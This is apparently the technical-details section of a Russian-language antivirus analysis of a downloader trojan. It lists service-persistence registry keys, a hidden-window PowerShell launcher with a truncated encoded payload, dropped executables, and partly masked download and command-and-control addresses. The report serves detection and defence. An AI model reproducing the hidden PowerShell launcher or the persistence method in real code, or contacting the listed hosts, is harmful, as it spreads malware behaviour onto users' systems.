Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\cardsmetrics] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cardsmetrics] 'ImagePath' = '"%WINDIR%\SysWOW64\cardsmetrics.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...
- %HOMEPATH%\469.exe
- %HOMEPATH%\469.exe в %WINDIR%\syswow64\cardsmetrics.exe
- http://aq###uore.com/wp-admin/z7z8-u7hfr-511/
- http://81.###.253.80:443/QE8QSgcOz3KV2XfgRF via 81.##4.253.80
- DNS ASK aq###uore.com
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\cardsmetrics.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABSAHQAdgBwAGgAeQBhAHUAaQA9ACcAUQByAG8AcwBjAGUAagBhACcAOwAkAFMAYQBwAGMAegB5AGcAeABjACAAPQAgACcANAA2ADkAJwA7ACQAVAB1AGcAbQBmAGYAZwBtAHkAZwB6AD0AJwBDAGwAYwBmAGMAZQB1AGYAawBvAGoAJwA...' (со скрытым окном)